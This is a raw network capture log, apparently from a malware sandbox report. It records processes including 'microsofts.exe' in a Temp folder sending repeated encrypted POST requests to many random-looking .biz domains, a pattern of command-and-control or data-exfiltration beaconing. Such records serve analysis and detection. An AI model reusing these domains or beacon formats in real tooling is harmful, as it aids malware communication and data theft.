Oct 20, 2024 18:42:48.847824097 CEST	353	OUT	POST /qsmoxnmhx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:48.847841978 CEST	826	OUT	Data Raw: e8 64 f9 91 74 b9 4e d1 2e 03 00 00 8c f5 71 58 14 ac 0e 6f 75 c3 fd 61 a9 b0 4c 9e 44 94 63 8a 35 e8 b0 1e 5c 9f ac 7a 4e d5 71 0f f9 60 1d 0f d8 40 1d 36 83 0c 01 e5 3f d2 6b 24 69 91 3a 0a 97 bc 94 90 1d 41 99 7e 3b 89 22 4e 06 9e f7 62 b3 18 Data Ascii: dtN.qXouaLDc5\zNq`@6?k$i:A~;"NbhHpH!Mt7^xgg4'VIiYT8m1uzr6S_:;7^kz=[/O3 rm"s[[q_^:"suT{g]2][4LJi6X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50052	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:49.755871058 CEST	354	OUT	POST /wgsqpusbi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:49.755872011 CEST	778	OUT	Data Raw: 88 82 c8 47 0a 73 cf e4 fe 02 00 00 f7 fb b1 ea 90 cf 10 d1 7f 1d fe d5 e0 a7 b6 5e 21 2f e5 12 0b 58 c7 51 a8 0a 65 3c 28 c2 3f bb 49 b6 41 91 4e b8 15 1b 6b 38 24 8d 6a d9 b3 a8 d2 a8 9a 40 c9 c3 5e 15 85 28 eb a7 8d 16 46 49 a1 38 ef dc dc 71 Data Ascii: Gs^!/XQe<(?IANk8$j@^(FI8q$y4,1Y]NOF"<r04:_]OAlF;:bN1zyR^BB&lUz'vOitK2Ex9C4Bh4\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50054	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:49.787297964 CEST	351	OUT	POST /dpkfjsv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:49.787328005 CEST	826	OUT	Data Raw: 76 4f 25 37 33 d4 a6 c2 2e 03 00 00 42 ba 29 e9 a8 57 f0 97 9e 5b 53 5e 63 7a d8 f4 cd cf cd 1e 37 99 c6 cd 90 ea 5f 07 fb dd cd 3a 3f 5c 11 12 26 23 fb 9f ff 07 ba c8 22 03 a3 e2 cf de 1e b4 af 1c ab 20 05 4e f6 64 c8 9e 64 0a 3a 8b 3e 32 bd 18 Data Ascii: vO%73.B)W[S^cz7_:?\&#" Ndd:>2#r7P8O^0GLD&MYBf8$2GMUZHQGEUvBrK7dF5-TyPH!iny;loF>gbbz9;i694l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50060	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:51.358932018 CEST	351	OUT	POST /rtsxpsr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:51.358963966 CEST	826	OUT	Data Raw: 86 95 54 83 1c 92 63 85 2e 03 00 00 87 8d c1 cb 72 ca 4c b6 1c 7d ce 2c aa 62 59 d0 a9 31 ca d6 2f 6d 04 91 08 44 7a 82 2d e1 46 f4 69 6f 79 a0 8b 64 fa 4d f2 9e 3a a0 9b 0b 99 3b 69 d2 38 be a5 d6 f5 67 92 c3 1b 2f cf 01 c0 a6 75 8c 2d 8b c5 40 Data Ascii: Tc.rL},bY1/mDz-FioydM:;i8g/u-@p1xK\:kH-6,2(!^c'>+T~t9hT7EOb/(h1G_0_a@Z)PA8Ofg7YW2G\r.)84CnHeUAhI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50062	34.211.97.45	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:51.682789087 CEST	353	OUT	POST /sywsqcciw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:51.682811975 CEST	778	OUT	Data Raw: a0 59 94 de 83 b8 9b 99 fe 02 00 00 ba 19 6a 13 fe 40 99 60 05 e7 3f 03 40 61 87 fd be f3 6d c0 87 1e 08 49 9a ba 45 04 b0 94 9b 2e ec 7a 56 d6 db c2 56 3f df d6 ff a6 c1 ef 12 b5 5e 88 b0 8c 32 9e 45 d6 48 e5 9e 29 ae 2d 72 45 de 9a 55 65 d2 59 Data Ascii: Yj@`?@amIE.zVV?^2EH)-rEUeYnGDE&N{%uFe^2Z\k00[9'4m!\|6?^%A\>)DR[i$^]%gdr2SllNoq
Oct 20, 2024 18:42:52.648947001 CEST	414	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e0cd392b78c0bc61564af33c4c7923d1\|96.44.151.125\|1729442572\|1729442572\|0\|1\|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50070	44.213.104.86	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:53.521321058 CEST	353	OUT	POST /gksshbghniig HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:53.521354914 CEST	826	OUT	Data Raw: 10 b4 9e 0e 27 cd 73 69 2e 03 00 00 ce e5 12 be c6 23 e4 9f 66 3e b5 f2 a2 dd f9 cb db 5b d9 06 27 c4 2f c6 1c 8e bd 6d 2e aa 75 a4 55 96 33 d5 68 26 0e de ba 2e 7b 3d 6c 72 6d c6 ae a1 cb be 9c 84 04 39 a9 0a 0c 15 8a 4c 64 08 1b d9 bb 69 97 78 Data Ascii: 'si.#f>['/m.uU3h&.{=lrm9Ldix5o2?#4mmYk4]d\|F1m]Xv-Mu>/SX;6"Ao'_U-7%q(CKn??{f0%aSWs{qzqm!X2j>D\|a*Ov

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50075	47.129.31.212	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:54.031164885 CEST	353	OUT	POST /skudpvsbobr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:54.031193018 CEST	778	OUT	Data Raw: 02 a3 7d 6a 24 a7 7c 92 fe 02 00 00 ab e3 5f 91 5c 68 4c 6c 03 1a de 5e 2c b0 bd 27 cf ee e5 c8 2f 61 74 ed 0e e0 5d f8 47 77 f5 0c bf 57 07 bd b3 40 28 70 7c ca 7a 49 b1 79 85 15 67 65 4e a1 b8 78 e5 b9 64 38 99 76 3a 82 2f d7 c0 b2 37 09 94 c2 Data Ascii: }j$\|_\hLl^,'/at]GwW@(p\|zIygeNxd8v:/7%jPoI^UH%H RA7SN\|Q5.:NB\kA6Yro_Y\|XhX@6;04ae>v3rj=s65v#X{+$@vJEYjt!B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50076	44.213.104.86	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:54.477004051 CEST	348	OUT	POST /flkllmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:54.477035999 CEST	826	OUT	Data Raw: 76 08 0e 76 be 97 6c 82 2e 03 00 00 19 df 50 62 a2 9e 97 06 42 0d a3 b0 da a1 c5 a7 ef 0d 34 f9 86 e7 ae 8f 2a 65 10 43 7b 25 ac 6f 7b 30 d8 b0 ca 36 d8 b0 09 a0 13 12 18 6d a1 06 b8 c7 4d bb 7d 8b af 00 0d db 6b 6c 58 12 35 55 ea 45 c3 a6 86 f2 Data Ascii: vvl.PbB4eC{%o{06mM}klX5UE~B=<3$m_I`/crnn0bQ=9i.:$Mh6tikV:lbA88lwo}"v'LP~[W[?{yT9kIrCMVav<_r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50082	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:55.383100986 CEST	357	OUT	POST /skmiedduquder HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:55.385313034 CEST	826	OUT	Data Raw: 0c 6a 9f 46 e8 ec 16 28 2e 03 00 00 59 a6 0e 71 1d 20 61 76 e2 e1 6c ce e5 5a 6f 4a 07 9f a8 4f 12 85 23 a6 23 54 8d dc c9 49 8c 8a 5a 4b c4 2f 3f 9a 7f 27 2d d2 36 ee 8e 0c 00 9b f3 fa 4d df ca 67 ca db 51 60 44 9a 37 d9 49 7f 5a 84 59 cd 38 b7 Data Ascii: jF(.Yq avlZoJO##TIZK/?'-6MgQ`D7IZY8Ly0t)Jy&w<4]Q>ApQLspIeS&hC\\|#99;Ye#B8y-h:W;e_Qos}bXPEF~9eVt.}8R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50083	47.129.31.212	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:55.692539930 CEST	344	OUT	POST /gs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:55.692581892 CEST	778	OUT	Data Raw: f1 9a 9f 04 2c 9b c8 48 fe 02 00 00 4b c7 bb 69 ff d2 1a cf 91 b6 47 c6 ad 44 25 fe 68 c4 ad 9b 1b 06 06 12 c5 89 09 ae 83 af e4 92 dd d2 5c 7c bb e5 25 70 61 0f 8b b0 22 32 36 ea 4c b9 46 ca 2d 0a d2 c4 2c 97 a6 94 90 d2 a3 07 ce 34 7a e6 cd d1 Data Ascii: ,HKiGD%h\\|%pa"26LF-,4z9(fO^]m N6GYSzC}ea%a+]yaW:)Ej x0` 8R,yx4=tbCh{`.t#jd4WO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50085	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:56.447575092 CEST	348	OUT	POST /hjhd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:56.447575092 CEST	826	OUT	Data Raw: 13 6a 51 46 18 85 c6 d8 2e 03 00 00 bf 8e 42 90 b9 74 fa 2e 19 7d a6 71 f9 ff 31 dd ce 8c 6b 11 38 60 65 47 e5 43 45 c2 0f 7b 2c 77 30 d8 5e 43 ec 3c d8 4d 38 da 95 5f 81 70 4a 05 91 6f fb 27 fd 97 f7 53 df c0 a8 e4 c6 a7 9f c8 a7 62 03 f6 88 07 Data Ascii: jQF.Bt.}q1k8`eGCE{,w0^C<M8_pJo'SbeMD2bo}(fe@Fy^Qm_\|8!O)!Q#]{s7*LQPHobU7Z#Nn@E&)OeuD_5upf&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50090	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:57.379013062 CEST	345	OUT	POST /qmr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:57.379045963 CEST	826	OUT	Data Raw: 3a ee 78 d4 06 0e c9 12 2e 03 00 00 af 88 67 76 92 58 f3 38 fd 88 71 47 bb 5f 17 3e 17 60 49 77 52 01 3c 5c 01 50 95 3d d8 e9 20 73 49 3e 98 2f b7 80 56 f8 bd 94 7d 82 95 7b 3f 42 c0 f8 0b 14 b8 a9 4a ae bf 71 0c cb 41 a9 90 fc 34 12 03 61 69 5b Data Ascii: :x.gvX8qG_>`IwR<\P= sI>/V}{?BJqA4ai[H`jtmx5)%`St_iosm5$SC;4rSHm(?7w*]?l7;5Gl(&g<(P02U3\&UOT91$i-3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50095	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:57.697318077 CEST	354	OUT	POST /wlirwlunhdx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:57.697364092 CEST	778	OUT	Data Raw: 3c 20 eb 5b 08 b9 6f 22 fe 02 00 00 ef 95 95 43 3a e6 96 67 42 8e d1 fe e9 67 5e 6a e3 be 7b 6c 2a 81 3d 03 78 a1 19 41 5f 3c be b9 50 d9 57 6f 38 8d 42 a2 ae db 6d 95 39 de ab 72 7e a5 24 2c 64 45 21 ba 30 72 e6 8e 85 7a a4 ac 9a a7 f7 ff b7 cc Data Ascii: < [o"C:gBg^j{l=xA_<PWo8Bm9r~$,dE!0rz8D;o w<uceb/$Qx\^o&>y]A9Fso=jMHm;?pb$`wVFhLS1v*;UKM>4LE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50101	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:58.903075933 CEST	355	OUT	POST /fapfitlarmcnk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:58.903090000 CEST	826	OUT	Data Raw: 9c f6 15 24 e0 64 5b e0 2e 03 00 00 3d aa 32 41 f9 1a 91 e9 78 30 2a 7c 9d d1 df 17 dc fc 15 69 58 04 b3 04 86 bc ae 27 68 ad fd 35 3e 27 4a aa 1d 0b 78 39 5c ce f5 e5 f5 13 b2 54 a0 52 2d 05 bc 60 c0 a2 39 dd 41 e4 95 2b 47 e3 bd 26 27 00 c7 8f Data Ascii: $d[.=2Ax0*\|iX'h5>'Jx9\TR-`9A+G&'i^Bl!b.F4%YL!H!PlP +hel{fzQEojOt!/zQB!?Cim>1$S5xf,R,?BEet\|pZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50103	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:59.368331909 CEST	344	OUT	POST /m HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:59.368364096 CEST	778	OUT	Data Raw: c1 71 04 d5 77 42 00 d9 fe 02 00 00 43 88 31 25 56 50 11 4c ca 42 45 b7 82 5f d9 a8 90 33 7f 5b 1a 04 6b 1a 74 30 ca b3 ac a1 2b 84 f5 ef 7e e0 f0 f0 77 48 10 5c 75 4e fa 77 50 ec cb 56 6a 47 da ec a7 b0 74 71 d7 46 b6 44 5c 41 7d 19 4a ef 88 0a Data Ascii: qwBC1%VPLBE_3[kt0+~wH\uNwPVjGtqFD\A}JeSv?})i?&2._]VF<8s@t3C,@UO?haHObJ<]9j\it!<cT!b)g@?Y2hA+;/z%q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50109	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:00.466962099 CEST	358	OUT	POST /hpebeygkilgsi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:43:00.466996908 CEST	826	OUT	Data Raw: ac 37 de 7f 8b 8f 3d 77 2e 03 00 00 bd 97 5a a1 6e 5e 67 af 9f af bb b8 a3 06 c4 81 86 26 0c c5 be 6a 05 cb a7 c4 9c db d2 43 56 b5 1e e5 5a 71 80 ad 91 59 43 ea 84 88 51 02 40 ad e2 ed c6 27 46 f1 1c fd 6d a4 35 5f f8 4e f6 5e e6 a2 f1 8b c2 7e Data Ascii: 7=w.Zn^g&jCVZqYCQ@'Fm5_N^~[X?+XO'PfON \%!:_d%(&EV,\Qnx(*qK"'7l8l(U1lg^_j.BrN[qu9bg \

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50115	34.211.97.45	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:02.015450001 CEST	356	OUT	POST /hbbreaeoihjkosw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: esuzf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:43:02.016129971 CEST	778	OUT	Data Raw: 05 31 03 7f 63 1e 68 08 fe 02 00 00 27 ea de 53 47 05 b3 0f 1c d3 0e aa d0 83 54 98 c1 81 a7 25 6c fe 18 90 5e c1 16 9a b4 05 c2 5f 65 f6 07 39 88 bf a9 c8 31 68 ce 44 94 ab 66 9d 4d d2 3c 5c df 3f a6 4f 6a ba f9 ad 17 eb d6 93 6b d7 3a ae a8 25 Data Ascii: 1ch'SGT%l^_e91hDfM<\?Ojk:%bkk}zvU &XwPAr>aB(m,bIA:<xsV?-s_B:A&mSkTr\ico7Q}I>j]E/
Oct 20, 2024 18:43:03.963267088 CEST	411	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:43:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=06c842c805ebb5ef10016fe80d4e8793\|96.44.151.125\|1729442583\|1729442583\|0\|1\|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50116	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:02.043226957 CEST	346	OUT	POST /d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:43:02.043240070 CEST	826	OUT	Data Raw: 70 c4 0c 5a 2f e7 c5 0a 2e 03 00 00 c6 26 69 e0 79 f6 45 1b 7d 6a 5c ec f7 8c 76 ce 8a a2 44 e4 63 12 75 5f 7d 44 e7 b5 94 69 f8 2a c0 63 1c 1c 63 dd 62 ca 7b 27 70 19 75 d7 74 57 82 a4 42 39 2f a8 ec 6b 25 53 ef 72 91 17 e2 76 42 46 c0 77 a2 71 Data Ascii: pZ/.&iyE}j\vDcu_}Diccb{'putWB9/k%SrvBFwq=<s\|5:U^BWh]9ir^O\2Fu%Z:WW)/<'?7CL{Ay17uC4DUF81zO[VSam2nn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50125	34.211.97.45	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:03.885544062 CEST	351	OUT	POST /qsxryrm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:43:03.885556936 CEST	826	OUT	Data Raw: 8e 6c f6 5b d3 66 ee 02 2e 03 00 00 3b 71 7c e1 68 fd c1 d5 37 29 4f 08 60 78 09 4f fc 3a ee a6 82 87 73 90 10 48 14 bc 51 0f 51 14 6a b5 f3 33 7e 0e e2 f3 a1 d4 74 b6 7c 7c 14 88 87 09 67 00 48 a5 11 a6 51 69 c3 ab 2c be 68 24 4f 95 a0 64 d3 aa Data Ascii: l[f.;q\|h7)O`xO:sHQQj3~t\|\|gHQi,h$OduE/:eLW=tsS\|N{{wO[oeu9!_sDmD^TVg:wQygRh}%]JhD9lsh@,[?h.nOY/IpBo_]
Oct 20, 2024 18:43:04.815924883 CEST	414	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:43:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=9737b6e8827f74086a293a3f0322b279\|96.44.151.125\|1729442584\|1729442584\|0\|1\|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50126	3.94.10.34	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:04.331859112 CEST	347	OUT	POST /dw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:43:04.331993103 CEST	778	OUT	Data Raw: cf 24 2d 2b 53 20 dc 6f fe 02 00 00 64 d0 9c 46 f6 63 34 e1 32 13 58 80 f7 22 c5 a5 be 69 c3 d6 36 21 af 58 8e 76 70 f8 22 0a c3 08 cd d4 7c 2c 31 cb 56 56 f0 ef 5e bc fa cc 53 be 50 ed ff ac df 27 0e f5 00 d2 f2 8e e5 db 0a f1 7e 5a 0a cd 06 58 Data Ascii: $-+S odFc42X"i6!Xvp"\|,1VV^SP'~ZXL7=ENFGE!&g%<8P&?_'#?COTwYmXzAzOQAT -tK~1y8<YQl]Oyz\|<mzet6H\|S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50128	47.129.31.212	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:04.847117901 CEST	345	OUT	POST /hph HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:43:04.847146034 CEST	826	OUT	Data Raw: a2 b8 c9 ca 9d 56 81 28 2e 03 00 00 77 59 91 28 d7 ec df 0d fa 26 bc 8e e4 15 a1 3c ab d4 9a a7 be df 84 eb da 72 5e 99 79 eb 31 38 2c 80 81 70 65 6e 09 45 59 3a 6d a2 21 0e ff 44 8c 0e 9a dd 3f a4 86 56 2f 0e 1d 36 e9 63 86 ac a1 2f 2f 22 60 52 Data Ascii: V(.wY(&<r^y18,penEY:m!D?V/6c//"`RMD,6(\|czD3@~[\bm%?e5BX.Glj\|G$X))gp[F)Gt54P=~>j`V%uOq.0)

